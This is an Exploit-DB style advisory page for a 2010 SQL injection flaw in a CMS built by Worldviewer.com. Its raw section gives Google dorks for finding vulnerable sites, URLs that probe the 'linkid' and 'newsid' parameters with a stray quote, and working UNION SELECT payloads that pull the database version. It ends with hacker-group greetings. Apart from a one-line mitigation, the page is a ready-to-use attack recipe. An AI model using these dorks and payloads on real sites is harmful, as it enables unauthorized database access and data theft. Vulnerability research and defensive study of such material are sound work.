header-logo
Suggest Exploit
vendor:
CMS
by:
41.w4r10r aka AN1L
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache/Unix
2010

Worldviewer.com CMS SQL Injection Vulnerability

This is a vulnerability in the CMS created by the leading web development company Worldviewer.com. It allows attackers to inject malicious SQL code into vulnerable parameters in the URL. This can be exploited to gain access to the database and potentially sensitive information.

Mitigation:

Input validation should be used to prevent malicious SQL code from being injected into vulnerable parameters in the URL.
Source

Exploit-DB raw data:

# Exploit Title: Worldviewer.com CMS SQL Injection Vulnerability
# Date: 12-4-2010
# Author: 41.w4r10r aka AN1L
# Software Link :
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Dork :  inurl:"php/showContent.php?linkid=" Or inurl:"/php/showNews.php?newsid="
# Code :

This Is The CMS Created by The Leading WebDevelopment Company Worldviewer.com For There Clients and all have same
vulnerability.....


Exploited Link :

1) http://example.com/php/showContent.php?linkid=5'

2) http://example.com/php/showNews.php?newsid=39'


Live Demo :

1) http://example.com/php/showNews.php?newsid=-5+union+select+all+1,version()--

2) http://example.com/php/showContent.php?linkid=-5+union+select+all+version()--





#41.w4r10r (41.w4r10r@andhrahackers.com<mailto:41.w4r10r@andhrahackers.com><mailto:41.w4r10r@andhrahackers.com<mailto:41.w4r10r@andhrahackers.com>>)

#################################################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
#Thanks: SaiSatish,FB1H2S,Godwin_Austin,Micr0,Mannu,Harin,Jappy,DJ Hoodlum Don,Akee
#Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d
#Catch us at www.andhrahackers.com<http://www.andhrahackers.com><http://www.andhrahackers.com> or www.teamicw.in<http://www.teamicw.in><http://www.teamicw.in>